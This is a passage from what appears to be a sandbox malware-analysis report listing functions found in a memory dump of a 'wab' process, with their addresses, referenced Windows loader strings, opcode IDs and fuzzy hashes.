Instruction Fuzzy Hash: 7D51AD715847429FC724EFA8C5447A7B7E5AF84308F00E83EE9AA87640E774E545CF92

Function 02E7A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 02E7A2FB
RtlpResUltimateFallbackInfo Exit, xrefs: 02E7A309

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 5b861c519dde255ae4c8f6f8b4fb79a9ba0f3bf847ac4e8d5e58dfa9204b85b3
Instruction ID: 51b6cfe84349b671924685da4932787a51fe3d9ded9c5280f932a0842c838fee
Opcode Fuzzy Hash: 5b861c519dde255ae4c8f6f8b4fb79a9ba0f3bf847ac4e8d5e58dfa9204b85b3
Instruction Fuzzy Hash: 2E41BC31A84649EBCB21CF69C850BAE77B4EF85708F14E0A9ED04DB391E375D901CB40

Function 02EA329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

.Local\, xrefs: 02EA32B5
@, xrefs: 02EA330D

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: .Local\$@
API String ID: 0-380025441
Opcode ID: d68f0cd38b6372d723489fd97f900d15760c97fa2c882ebf7f836346ddc47a5d
Instruction ID: b571a4fe2df8e3b5fa363663a743accf9fbbe6c9155e2642da255d9b9c1a01be
Opcode Fuzzy Hash: d68f0cd38b6372d723489fd97f900d15760c97fa2c882ebf7f836346ddc47a5d
Instruction Fuzzy Hash: E431817158C3049FC311DF28C490A9BBBE9EFC4654F4499AEF9A987250DB31ED08CB92

Function 02E7C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 02E7C8C3, 02E7CA40

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 5b681de52b7c33177a2cb2f40fd6ad1ea1d7d572c25b4a3a49293909949e2bf2
Instruction ID: 872048cbd4af36e3ea9b2590dcbd8a97dcbab7a9ede2772d76b273c2777e3b56
Opcode Fuzzy Hash: 5b681de52b7c33177a2cb2f40fd6ad1ea1d7d572c25b4a3a49293909949e2bf2
Instruction Fuzzy Hash: 34825D75E402189BDB24CFA9C8907EDB7B5FF48318F24E16AE919AB350D7309981CF50

Function 02E77370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3ddf94d081e8341dbe1c9c6361042e8a3be3f1a418ab2482a9be28fb1949ded
Instruction ID: 6bfbc19f649d46b8146841883e00dc09f6813188c424e6c05ae73cf50e6bc5c5
Opcode Fuzzy Hash: e3ddf94d081e8341dbe1c9c6361042e8a3be3f1a418ab2482a9be28fb1949ded
Instruction Fuzzy Hash: 9AA14871A483418FC321DF28C480A6AFBE6BF88744F14996DE5999B350E770E945CB92

Function 02EAF603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebe4f0418d9d1dfe9831242246ce4c62e6febbe1200eed59720045da675bdc9b
Instruction ID: 69ae9f726289d86064d6e68637da3fd70d17f258dfa3a532284f0fe7e3406413
Opcode Fuzzy Hash: ebe4f0418d9d1dfe9831242246ce4c62e6febbe1200eed59720045da675bdc9b
Instruction Fuzzy Hash: 59413B74D402489FDB11CFA9C480AEEFBB4FF48784F10956EE559A7611D731A904CFA0

Function 02EAA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 02EE67C9

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 37dbc279df769e8cf3b78c9d9118204c1ea5293b01fff1c2cb02a8e500d9d693
Instruction ID: 3bb54041d9290d50893a69caeff4abcf9e4cf99f5e2920fe51fc5cccde5cb652
Opcode Fuzzy Hash: 37dbc279df769e8cf3b78c9d9118204c1ea5293b01fff1c2cb02a8e500d9d693
Instruction Fuzzy Hash: 8F717C75E8020A8FDF28CF98D5916EDBBB6BF58748F14D12AE816AB340E7309941CF54

Function 02E7973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

@, xrefs: 02E797F3

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
Instruction ID: 5e551b4e3dfc137048fb21affb2df7a359e1d8125009ef03a7272c281a847cdb
Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
Instruction Fuzzy Hash: 78619D71D80259AFEF21DFA9C840BEEBBB5FF85718F149169E910B7291D7309A01CB60

Function 02EFF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

@, xrefs: 02EFF867

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
Instruction ID: 6fe90a259711d467a7072ba6d5eaae391a1159d68b48c8caa048bde88e348d07
Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
Instruction Fuzzy Hash: C851DE72584741AFD7229F54C840FABB7E8FF84B58F40992DBA8497690D7B0ED04CBA1

Function 02E8E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 02E8E6A4

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: e07e3e4c03d266391ffeaaa0d49f4865df9a6c9b9a1361f3366856834eeb521f
Instruction ID: d142786e4119fb929d0528de196c16296da7fda37ac32aa0d9e384c1928b5bc9
Opcode Fuzzy Hash: e07e3e4c03d266391ffeaaa0d49f4865df9a6c9b9a1361f3366856834eeb521f
Instruction Fuzzy Hash: 8A41B4725843119BD711EB74C840BABB7D9AF88708F48A92DFACCE7140E774D904CB96

Function 02F2B256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 02F2B28F

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: PreferredUILanguages
API String ID: 0-1884656846
Opcode ID: aab2de655b43ca9f2c0420edfb192f0da4d73350967716d0d53c597068524e91
Instruction ID: 80d8392dc887b207e8da5045d2e3568bb929ecc9bf70e9b7d54cd82ee73424a8
Opcode Fuzzy Hash: aab2de655b43ca9f2c0420edfb192f0da4d73350967716d0d53c597068524e91
Instruction Fuzzy Hash: E041B672E00629ABDF11DA94C940BEEB7B9AF45798F054166EE11F7250D730DE44CBA0

Function 02EEC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 02EEC77F

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 726af5d921b636d0def3a67d239f2db84976ea4b83182fd4680f940c625ae23b
Instruction ID: 766defe6b4298657998642ad639d327479c778ed2200307816fc179bd33778f2
Opcode Fuzzy Hash: 726af5d921b636d0def3a67d239f2db84976ea4b83182fd4680f940c625ae23b
Instruction Fuzzy Hash: 664188B1D4052C9ADF21DA50CD80FDEB77DAF44718F1095E6AB19A7140DB30AE498F98

Function 02EF97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

verifier.dll, xrefs: 02EF9870

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: verifier.dll
API String ID: 0-3265496382
Opcode ID: 0ba6f2cccdccf9b75eb2e667d6b94948f0f5eda9d94b34a24fb381c3e36c32a7
Instruction ID: 6980669484e23a53bb538de3fd80d889bf5b6c170f51e968f00773cc3e1c232d
Opcode Fuzzy Hash: 0ba6f2cccdccf9b75eb2e667d6b94948f0f5eda9d94b34a24fb381c3e36c32a7
Instruction Fuzzy Hash: 9E31B571B80341AFDB649F29D860B76B3E5EB88758F94D43AE689DF281E7318C818750

Function 02F1705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

kLsE, xrefs: 02F170A4

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: kLsE
API String ID: 0-3058123920
Opcode ID: 334dd8f5611988668eeefdafdc8de943a7f0e6089d144d1e16f693a36f885aca
Instruction ID: 7b9d6f2dce7665b7ba0d1037c38f106256031a154deb56d68dc1f4af09135489
Opcode Fuzzy Hash: 334dd8f5611988668eeefdafdc8de943a7f0e6089d144d1e16f693a36f885aca
Instruction Fuzzy Hash: 58415831D8134856F721BB64E94CB66FB99EB01BE8F540A59EE64DA0C1CB784491CB90

Function 02E75096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 02E750BF

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 3a3b8229dcb73a06b92530b1cf085a685c4ba8c9f0f6c156bb37594ba9004ad4
Instruction ID: 6259767b870106ca25ea5035ce65e3c88c5c79352e4e98303ba6f21016339848
Opcode Fuzzy Hash: 3a3b8229dcb73a06b92530b1cf085a685c4ba8c9f0f6c156bb37594ba9004ad4
Instruction Fuzzy Hash: 1F1193307C46078BDB24591D98507B67295EB9232CFB4E52AEC62CB390D771D841C390

Function 02EC739A Relevance: .7, Instructions: 705COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f11a71310db374f883b99257b7dc4759bb1cbf745f45201246dcbd7757356c7f
Instruction ID: 2546e0d845476d8d1c59cc9a3e84dba1f665c537287cdd09ae68d60880f7c0a4
Opcode Fuzzy Hash: f11a71310db374f883b99257b7dc4759bb1cbf745f45201246dcbd7757356c7f
Instruction Fuzzy Hash: F6429071A406168FCB18CF99C9506AEF7BAFF88318B24D56DE556AB340D734E842CF90

Function 02E9B2C0 Relevance: .6, Instructions: 629COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20ef19ce5c0eeec71b19e5aa2b2553b4e3e9172f63e54cb059ab586b0bcc7b95
Instruction ID: fc32e785760ebda4431bb94bb63f2ce34547e77a980eb8820b61ba867901733d
Opcode Fuzzy Hash: 20ef19ce5c0eeec71b19e5aa2b2553b4e3e9172f63e54cb059ab586b0bcc7b95
Instruction Fuzzy Hash: 9C329E71E402199BCF14CF98D894BEEBBB6FF54718F18912EE805AB381E7359911CB90

Function 02F1A118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3f5e84a057914200c4026d38426f0fd482c5b46ee352f6588e95c0fb5a24259
Instruction ID: 0898a1d1dbb769f78d4c050bc500e187de7d28c0de8b482b8b29d7df72f4e252
Opcode Fuzzy Hash: e3f5e84a057914200c4026d38426f0fd482c5b46ee352f6588e95c0fb5a24259
Instruction Fuzzy Hash: 5D22F371B066908FDB25CF29C094372B7F1AF44384F98849ADA96CF286E335E552DB60

Function 02F316CC Relevance: .6, Instructions: 571COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8de6922c0a14b38ff8ebf357f3b58a3e06425d6d9d210ad6e512ac82b72863d3
Instruction ID: 8b9e0fcd9b78fbdf375bd06bf95ce97effd8205825d86185b76a3f625ffed1f3
Opcode Fuzzy Hash: 8de6922c0a14b38ff8ebf357f3b58a3e06425d6d9d210ad6e512ac82b72863d3
Instruction Fuzzy Hash: 45227335F002168FCB1ACF59C490ABBB7B2BF89354B18856DDA5ADB345DB30E941CB90

Function 02E68397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ed243e0b123dc66bda8ef27be8d4f2c5793607929acbfe0363f17298610930f
Instruction ID: 95b57f66a4852d758d60b6984406313434238dffb61aea6fe008e73c545414a8
Opcode Fuzzy Hash: 2ed243e0b123dc66bda8ef27be8d4f2c5793607929acbfe0363f17298610930f
Instruction Fuzzy Hash: 1FD1E271AC02069BDB14DF64C985BBA73A6BF5438CF14D22DF916DB280EB30E949CB50

Function 02E7D7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: accaedf3dd84c5ae37151bdc186a4112f879e04c1e646eb50de2b37c42e43e30
Instruction ID: 56c1e03d0e61b9bc78eacd7897bc499bc31900c1ebe9f298ed3d2edd581e8689
Opcode Fuzzy Hash: accaedf3dd84c5ae37151bdc186a4112f879e04c1e646eb50de2b37c42e43e30
Instruction Fuzzy Hash: ADC1C371E402069BEB28CF58CC45BAEB7B6FF54718F18D269D915AB2C0D770E942CB90

Function 02E990DB Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be821a2662030e1f32d11875241d6c32cbf4f4d4340098b15d1e1e5da4e3f02a
Instruction ID: 52f27e9e6d6f1095885dc9d3cfb86ccd25c3830f2c4a580b7b9fa4807090b3e0
Opcode Fuzzy Hash: be821a2662030e1f32d11875241d6c32cbf4f4d4340098b15d1e1e5da4e3f02a
Instruction Fuzzy Hash: 0AA16A72980215AFEB12DFA4CC81FAF77B9AF45754F019098FA04AB2A0D7759C51CBA0

Function 02E783C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75358d603abcdad81a72e881992ba2a34018dee6a7e52aefa833f5d0edc12f5c
Instruction ID: b8babcbab0f71d401888d7372cb25950d3e1e8c50fdfc111a0219e5c7054c07a
Opcode Fuzzy Hash: 75358d603abcdad81a72e881992ba2a34018dee6a7e52aefa833f5d0edc12f5c
Instruction Fuzzy Hash: 79C15974548380CFD764CF15C484BABB7E5BF98308F44996DE9898B290E7B4E909CF92

Function 02EB0185 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb5aab10f6af07eabb4e654e3953c922906e4b708fc298845063c1391a5e5b0f
Instruction ID: 5bdce21f8bc9da19f8d5b2e7cfe5f81bee7dedc37ea4dcfbc61ab7aeee8563b0
Opcode Fuzzy Hash: cb5aab10f6af07eabb4e654e3953c922906e4b708fc298845063c1391a5e5b0f
Instruction Fuzzy Hash: 0DA1C170A806169FDB26DF65C990BEBB7F5FF44318F04912AEA0697281EB34F815CB50

Function 02E8E3F0 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b420ed33e4bcf131b1e905bfe9f905b4c0166093eaad3bc37c0dd029a5e8a7e
Instruction ID: c6ad517540581241dbb5bd85cc395f62bb62750832549e7217be4758a40a7628
Opcode Fuzzy Hash: 3b420ed33e4bcf131b1e905bfe9f905b4c0166093eaad3bc37c0dd029a5e8a7e
Instruction Fuzzy Hash: 4D911531A806159BDB24EF58C844BB9B7E2EF84718F09E065FD8DDB281E738D902CB51

Function 02E71131 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b58b05606a5163edf93002729eafe0f76b3c67f7cd1f82aff7686567b4c1538
Instruction ID: 890375853f80dcf940e45ece8a510c917ac9476cae661302cb671d3edf7343c5
Opcode Fuzzy Hash: 4b58b05606a5163edf93002729eafe0f76b3c67f7cd1f82aff7686567b4c1538
Instruction Fuzzy Hash: BCB103716493808FD354CF68C580A5ABBF2BF88308F14996EF899DB351D331E946CB52

Function 02E9D090 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
Instruction ID: 1631acee4806159e5f004066f60e5a615a5b491aeacd7a00a7dcb1add8e74d40
Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
Instruction Fuzzy Hash: 36818F72E405198BDF14DF68C9847EDB7B2EB88308F19E16AD815BB344DB319942CFA1

Function 02EAE284 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e73d6423a48b87a545945cb16a7a80242db224e334c4bbaf652639ad1f966f8f
Instruction ID: f55f65a08d51b1c7a1a8ac9c1073fdbae1979ea5b6f270a9c8592bb84daa16f8
Opcode Fuzzy Hash: e73d6423a48b87a545945cb16a7a80242db224e334c4bbaf652639ad1f966f8f
Instruction Fuzzy Hash: CF818071A40609AFDB25CFA5C890BEEB7FAFF88344F149429E556AB250D730BC45CB60

Function 02E8C640 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f80adb0168cd88aadf5dfd634e3ccd607869f2fc3e86486239fc87a7528689f6
Instruction ID: d03cb863a9149b6ca189402add602bfa566636c08b67a9e3d77051f1f91c41ab
Opcode Fuzzy Hash: f80adb0168cd88aadf5dfd634e3ccd607869f2fc3e86486239fc87a7528689f6
Instruction Fuzzy Hash: A171C475C406299BCB29DF54C8507FDBBB5FF49704F24A51AE89AA7350D3349802CBA0

Function 02E8260B Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 876f60943020c1a9a3b9df8a036c6e17d8cfb99005cd63a356639ea45c7b8126
Instruction ID: 9f2541f5bcc5f50f60b255b7ddcb8e6edfd2ca7cd8500e4f80d8ff07edb87418
Opcode Fuzzy Hash: 876f60943020c1a9a3b9df8a036c6e17d8cfb99005cd63a356639ea45c7b8126
Instruction Fuzzy Hash: AF71BC716842818FC311EF29C480B6AB7E6FF85318F09D5AAE99D8B351DB34DC46CB91

Function 02F062A0 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b24e59397ed643a375502d05abb1bac14a4f06d8392649c8c21aa9bc48c65fc2
Instruction ID: b13507fcb0f17dc67c8ace59e71c72a7c4a712fc7b567291cebaf6b8ccf7754b
Opcode Fuzzy Hash: b24e59397ed643a375502d05abb1bac14a4f06d8392649c8c21aa9bc48c65fc2
Instruction Fuzzy Hash: 22710136640B00AFDB329F14C984F56B7AAEF407A4F108828F756DB2E0DB70E954EB50

Function 02EF035C Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
Instruction ID: 8434c228c1a684a7ea3e5fdfa29f93899d348577db136604d970f6975e871c11
Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
Instruction Fuzzy Hash: AE717E71A40619EFCB10DFA9C984EDEBBB9FF48704F108569E649AB251DB30EA41CF50

Function 02F3132D Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d3c774ecb169fc9720cc15e6d43a47b7113492805bad2e0ef2396d59abbfe5
Instruction ID: 3cefbc91d2b69d33260530df957ebb227ca7ab0b098a71d98bcfbe5ec6dc2c96
Opcode Fuzzy Hash: b6d3c774ecb169fc9720cc15e6d43a47b7113492805bad2e0ef2396d59abbfe5
Instruction Fuzzy Hash: 04816C75A00209DFCB09CF68C590AAEBBF1FF48350F1581A9D859EB345D734EA51CB90

Function 02F3903E Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e6dc2be453be3fb06bd1c9d935a15c7104884a936a36c825c86e1f8ee2a5e67
Instruction ID: ac76b24633bd1d8feeb87941cdc27755998b1717ad36273e4ef2b6527832f864
Opcode Fuzzy Hash: 6e6dc2be453be3fb06bd1c9d935a15c7104884a936a36c825c86e1f8ee2a5e67
Instruction Fuzzy Hash: 1661F2B1700715AFD716DF64C884BABBBA9FF88784F004619FA59D7240DBB0E514CB91

Function 02E77703 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9db2e6c9aace4dfb8d12d8f6d4384259c7d90c5657ec207ac427cfa33e76fad4
Instruction ID: fbbf88e237e0e4c82525c2865f4cfcefd5fccd33e9dd3283ffede42098a363d8
Opcode Fuzzy Hash: 9db2e6c9aace4dfb8d12d8f6d4384259c7d90c5657ec207ac427cfa33e76fad4
Instruction Fuzzy Hash: 77614C71E40606AFDB18DF78C490AADFBB6BF88304F24D56AE519A7340DB30A951CF90

Function 02F392A6 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e324fd6fb54b497010b22e9a2905b44a173b994b983317a8d7d39c97be7fe59
Instruction ID: 3a4a551fe653a5418aaf8aa4da035d809682daa938852887b3a04c395fb7bedc
Opcode Fuzzy Hash: 3e324fd6fb54b497010b22e9a2905b44a173b994b983317a8d7d39c97be7fe59
Instruction Fuzzy Hash: FB612772A047418BD312CF68C994B6BB7E5BF80798F18446DEA858B381DBF5E805CB91

Function 02E6B2D3 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c133e38a3220c3295451a75f6a84bcbad53d39cca68f354cfbdcb865a4f315a
Instruction ID: 991f5df11a1de81e350100cbcc31f6eb69d58c108a02cbe1f0a22274dabac534
